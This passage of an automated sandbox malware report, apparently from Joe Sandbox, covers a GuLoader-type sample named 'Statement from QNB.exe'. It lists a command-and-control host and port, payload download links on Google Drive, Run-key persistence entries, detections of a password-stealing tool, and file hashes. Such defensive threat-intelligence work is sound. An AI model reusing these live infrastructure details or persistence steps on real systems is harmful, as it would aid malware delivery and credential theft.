z1s.us.to 194.85.248.156, 49806, 49807, 49808 DATACENTERRO Russian Federation 28->55 41 D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, PE32 28->41 dropped 81 Creates an undocumented autostart registry key 28->81 83 Creates autostart registry keys with suspicious names 28->83 33 iexplore.exe 1 28->33         started        35 iexplore.exe 14 28->35         started        37 iexplore.exe 1 28->37         started        39 2 other processes 28->39 file11 signatures12 process13

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Statement from QNB.exe7%ReversingLabsWin32.Downloader.GuLoader

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe7%ReversingLabsWin32.Downloader.GuLoader

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    17.0.iexplore.exe.400000.1.unpack100%AviraHEUR/AGEN.1125438Download File
                    12.0.iexplore.exe.400000.3.unpack100%AviraTR/Dropper.GenDownload File
                    12.0.iexplore.exe.400000.2.unpack100%AviraTR/Dropper.GenDownload File
                    16.0.iexplore.exe.400000.1.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    12.2.iexplore.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                    12.0.iexplore.exe.400000.1.unpack100%AviraTR/Dropper.GenDownload File
                    17.2.iexplore.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
                    16.0.iexplore.exe.400000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    17.0.iexplore.exe.400000.2.unpack100%AviraHEUR/AGEN.1125438Download File
                    17.0.iexplore.exe.400000.4.unpack100%AviraHEUR/AGEN.1125438Download File
                    17.0.iexplore.exe.400000.5.unpack100%AviraHEUR/AGEN.1125438Download File
                    12.0.iexplore.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                    12.0.iexplore.exe.400000.4.unpack100%AviraTR/Dropper.GenDownload File
                    16.0.iexplore.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    16.0.iexplore.exe.400000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    17.0.iexplore.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
                    17.0.iexplore.exe.400000.3.unpack100%AviraHEUR/AGEN.1125438Download File
                    16.0.iexplore.exe.400000.4.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    16.0.iexplore.exe.400000.5.unpack100%AviraSPR/Tool.MailPassView.473Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.imvu.comr0%Avira URL Cloudsafe
                    z1s.us.to:53440%Avira URL Cloudsafe
                    https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external0%VirustotalBrowse
                    https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external0%Avira URL Cloudsafe
                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                    http://www.imvu.comata0%Avira URL Cloudsafe
                    http://www.ebuddy.com0%Avira URL Cloudsafe
                    https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    docs.google.com
                    		172.217.168.14
                    		truefalse
                      		high
                      drive.google.com
                      		142.250.185.78
                      		truefalse
                        		high
                        googlehosted.l.googleusercontent.com
                        		142.250.186.97
                        		truefalse
                          		high
                          z1s.us.to
                          		194.85.248.156
                          		truetrue
                            		unknown
                            doc-00-5k-docs.googleusercontent.com
                            		unknown
                            		unknownfalse
                              		high
                              doc-0k-48-docs.googleusercontent.com
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://doc-00-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9ika2j8t7trtq51k7nrgujctt9nrsl81/1637759700000/06007705055686197661/*/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=downloadfalse
                                  		high
                                  z1s.us.to:5344true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://docs.google.com/nonceSigner?nonce=1h1o0go4qslkm&continue=https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e%3Ddownload&hash=pckr7av56kdraffkce6aepv1b87ssmgufalse
                                    		high
                                    https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download&nonce=1h1o0go4qslkm&user=09438607504833105235Z&hash=0o6b323c0rq74tch8ch7someetivr76bfalse
                                      		high
                                      https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=downloadfalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://doc-0k-48-docs.googleusercontent.com/qrD7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmpfalse
                                          		high
                                          https://drive.google.com/~D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmpfalse
                                            		high
                                            https://drive.google.com/J4D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmpfalse
                                              		high
                                              http://www.imvu.comriexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.imvu.com/iexplore.exe, 0000000E.00000002.81115436732.00000000007C9000.00000004.00000001.sdmpfalse
                                                		high
                                                https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/externalD7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491679427.0000000000955000.00000004.00000001.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://doc-00-5k-docs.googleusercontent.com/Statement from QNB.exe, 00000004.00000003.80967593583.000000000088D000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://docs.google.com/nonceSigner?nonce=1h1o0go4qslkm&continue=https://doc-0k-48-docs.googleusercoD7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488930602.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81489163627.000000000096F000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81495319894.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500013187.0000000000955000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491294279.000000000096E000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488546638.000000000093B000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491679427.0000000000955000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.imvu.comiexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 0000000E.00000003.81114391201.00000000032CD000.00000004.00000001.sdmp, iexplore.exe, 0000000E.00000003.81114359568.00000000032CD000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://drive.google.com/0ByD7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmpfalse
                                                        		high
                                                        https://doc-00-5k-docs.googleusercontent.com/%%doc-00-5k-docs.googleusercontent.comStatement from QNB.exe, 00000004.00000002.81018352703.000000000087F000.00000004.00000020.sdmpfalse
                                                          		high
                                                          https://doc-0k-48-docs.googleusercontent.com/D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81652133637.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81648906007.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://drive.google.com/MD7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmpfalse
                                                              		high
                                                              https://doc-0k-48-docs.googleusercontent.com/OdD7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmpfalse
                                                                		high
                                                                https://drive.google.com/JStatement from QNB.exe, 00000004.00000002.81017233540.00000000007F8000.00000004.00000020.sdmpfalse
                                                                  		high
                                                                  https://docs.google.com/b5D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmpfalse
                                                                    		high
                                                                    https://drive.google.com/FD7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmpfalse
                                                                      		high
                                                                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comiexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://doc-0k-48-docs.googleusercontent.com/%%doc-0k-48-docs.googleusercontent.comD7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmpfalse
                                                                        		high
                                                                        https://www.google.comiexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmpfalse
                                                                          		high
                                                                          https://doc-00-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9ika2j8tStatement from QNB.exe, 00000004.00000003.80962048215.00000000008C3000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81018228293.0000000000871000.00000004.00000020.sdmpfalse
                                                                            		high
                                                                            https://doc-0k-48-docs.googleusercontent.com/~D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81646618008.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81652133637.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81648906007.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.google.com/support/accounts/answer/151657?hl=enD7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488930602.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81495319894.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500013187.0000000000955000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488546638.000000000093B000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://drive.google.com/D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmpfalse
                                                                                  		high
                                                                                  https://drive.google.com/TD7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmpfalse
                                                                                    		high
                                                                                    https://doc-0k-48-docs.googleusercontent.com/vD7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488930602.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81495319894.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500013187.0000000000955000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491679427.0000000000955000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://doc-0k-48-docs.googleusercontent.com/3D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578885460.0000000000A95000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81572159339.0000000000A92000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81571978022.0000000000A86000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81574632157.0000000000A95000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://docs.google.com/:5D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmpfalse
                                                                                          		high
                                                                                          https://www.google.com/accounts/serviceloginiexplore.exefalse
                                                                                            		high
                                                                                            https://login.yahoo.com/config/loginiexplore.exefalse
                                                                                              		high
                                                                                              https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8lD7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651025400.0000000000698000.00000004.00000020.sdmpfalse
                                                                                                		high
                                                                                                http://www.nirsoft.net/iexplore.exe, iexplore.exe, 00000014.00000000.81194973126.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000002.81199952690.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000000.81193951260.0000000000400000.00000040.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.imvu.comataiexplore.exe, 0000000E.00000003.81114391201.00000000032CD000.00000004.00000001.sdmp, iexplore.exe, 0000000E.00000003.81114359568.00000000032CD000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://www.ebuddy.comiexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://csp.withgoogle.com/csp/report-to/gse_l9ocaqStatement from QNB.exe, 00000004.00000003.80961383094.00000000008C3000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80962048215.00000000008C3000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81485897734.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81568642879.0000000000A93000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81572159339.0000000000A92000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81571978022.0000000000A86000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown

                                                                                                  Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  142.250.185.78
                                                                                                  		drive.google.comUnited States
                                                                                                  		15169GOOGLEUSfalse
                                                                                                  172.217.168.14
                                                                                                  		docs.google.comUnited States
                                                                                                  		15169GOOGLEUSfalse
                                                                                                  194.85.248.156
                                                                                                  		z1s.us.toRussian Federation
                                                                                                  		35478DATACENTERROtrue
                                                                                                  142.250.186.97
                                                                                                  		googlehosted.l.googleusercontent.comUnited States
                                                                                                  		15169GOOGLEUSfalse

                                                                                                  General Information

                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                  Analysis ID:527846
                                                                                                  Start date:24.11.2021
                                                                                                  Start time:14:13:46
                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                  Overall analysis duration:0h 14m 26s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Sample file name:Statement from QNB.exe
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                  Run name:Suspected Instruction Hammering
                                                                                                  Number of analysed new started processes analysed:29
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • HDC enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@24/16@5/4
                                                                                                  EGA Information:Failed
                                                                                                  HDC Information:Failed
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 93%
                                                                                                  • Number of executed functions: 186
                                                                                                  • Number of non-executed functions: 337
                                                                                                  Cookbook Comments:
                                                                                                  • Adjust boot time
                                                                                                  • Enable AMSI
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  Warnings:
                                                                                                  Show All
                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 20.54.122.82, 20.82.19.171
                                                                                                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, client.wns.windows.com, wdcpalt.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  14:16:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4 C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe
                                                                                                  14:16:27AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4 C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe
                                                                                                  14:16:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4 C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  No context

                                                                                                  Domains

                                                                                                  No context

                                                                                                  ASN

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  DATACENTERROCV.exeGet hashmaliciousBrowse
                                                                                                  • 194.85.248.250
                                                                                                  INV.exeGet hashmaliciousBrowse
                                                                                                  • 194.85.248.250
                                                                                                  CV.exeGet hashmaliciousBrowse
                                                                                                  • 194.85.248.250
                                                                                                  TMR590241368.exeGet hashmaliciousBrowse
                                                                                                  • 194.85.248.115
                                                                                                  vIyyHkRXJnGet hashmaliciousBrowse
                                                                                                  • 194.85.250.154
                                                                                                  267A80yAhpGet hashmaliciousBrowse
                                                                                                  • 194.85.250.154
                                                                                                  QJYxAALd23Get hashmaliciousBrowse
                                                                                                  • 194.85.250.154
                                                                                                  z4bJfjXDDQGet hashmaliciousBrowse
                                                                                                  • 194.85.250.154
                                                                                                  XXaLHoecGpGet hashmaliciousBrowse
                                                                                                  • 194.85.250.154
                                                                                                  AGiCic4uDzGet hashmaliciousBrowse
                                                                                                  • 194.85.250.154
                                                                                                  3B3BMxYG8nGet hashmaliciousBrowse
                                                                                                  • 194.85.250.154
                                                                                                  6WMo1OYmk3Get hashmaliciousBrowse
                                                                                                  • 194.85.250.154
                                                                                                  dycuTng5W8Get hashmaliciousBrowse
                                                                                                  • 194.85.250.154
                                                                                                  xINX4f5M8sGet hashmaliciousBrowse
                                                                                                  • 194.85.250.154
                                                                                                  SSIuSyaBAFGet hashmaliciousBrowse
                                                                                                  • 194.85.250.154
                                                                                                  IMG600094173852.exeGet hashmaliciousBrowse
                                                                                                  • 194.85.248.115
                                                                                                  cdQc14SeRuGet hashmaliciousBrowse
                                                                                                  • 194.85.248.128
                                                                                                  t5dIUw7hghGet hashmaliciousBrowse
                                                                                                  • 194.85.248.128
                                                                                                  9hYMlirC3xGet hashmaliciousBrowse
                                                                                                  • 194.85.248.128
                                                                                                  qd7I0rgtfUGet hashmaliciousBrowse
                                                                                                  • 194.85.248.128

                                                                                                  JA3 Fingerprints

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  37f463bf4616ecd445d4a1937da06e19private-1915056036.xlsGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  private-1910485378.xlsGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  doc201002124110300200.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  t 2021.HtMLGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  INVOICE - FIRST 2 CONTAINERS 1110.docxGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  INVOICE - FIRST 2 CONTAINERS 1110.docxGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  Justificante.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  muhammadbad.htmlGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  MtCsSK9TK2.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  0331C7BCA665F36513377FC301CBB32822FF35F925115.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  6D2FF3CC83EA214E33E4105CCB1051CD85B82E052F615.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  vAsfZhw32P.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  FpYf5EGDO9.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  #U0191ACTU#U0156A_unxsxdxX_f_mMT_312.vbsGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  FhP4JYCU7J.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  ugeLMlEROB.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  NtqHVU6GDV.dllGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  anIV2qJeLD.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  FhP4JYCU7J.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97
                                                                                                  NtqHVU6GDV.dllGet hashmaliciousBrowse
                                                                                                  • 142.250.185.78
                                                                                                  • 172.217.168.14
                                                                                                  • 142.250.186.97

                                                                                                  Dropped Files

                                                                                                  No context

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\Local\Temp\computer+user.bmp
                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                  File Type:PC bitmap, Windows 3.x format, 448 x 448 x 24
                                                                                                  Category:dropped
                                                                                                  Size (bytes):602168
                                                                                                  Entropy (8bit):0.3769552161446796
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:hea40TugkKyauaoIO6AaiMGmWIeQ6wO3eTiwmzWzsAWyk2QgK:hMnqGKK
                                                                                                  MD5:908FA2DFB385771ECF5F8B2B3E7BFF16
                                                                                                  SHA1:1255FA1EDBD2DBBCAB6D9EB9F74B7D6783697A58
                                                                                                  SHA-256:60FF5131DBA68A8FFE7BA0475BF3E192B432E1969E5AC52D7F217F6935F4035D
                                                                                                  SHA-512:573C9FDE441FB8DEBAA44B6FA2D3763C3DC4714497089B82BEDC8EF0720EEA4A907F75CFFB1C0EC4A77AC89CFECBEF8E6182A2A8FEA5B51A2E91920CEAAD5F69
                                                                                                  Malicious:false
                                                                                                  Preview: BM80......6...(....................0....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\bhvD2BB.tmp
                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xbfe3589f, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14680064
                                                                                                  Entropy (8bit):0.05104590116414964
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:XSB2wn+SB2wdSjlK/Rv0eLwuD2DUtHg6DUUim4SDUS9r:XSB2w+SB2wdSjlK/tSuvJgvs4XSd
                                                                                                  MD5:10DEFF8235D17E095B335C5BC307DC29
                                                                                                  SHA1:8231C0246DFE325F16486E72E704EEDA93600DE6
                                                                                                  SHA-256:183316C75E588295C75A9E5F3E77A733F20BFB6E33620185C35598E0C3187372
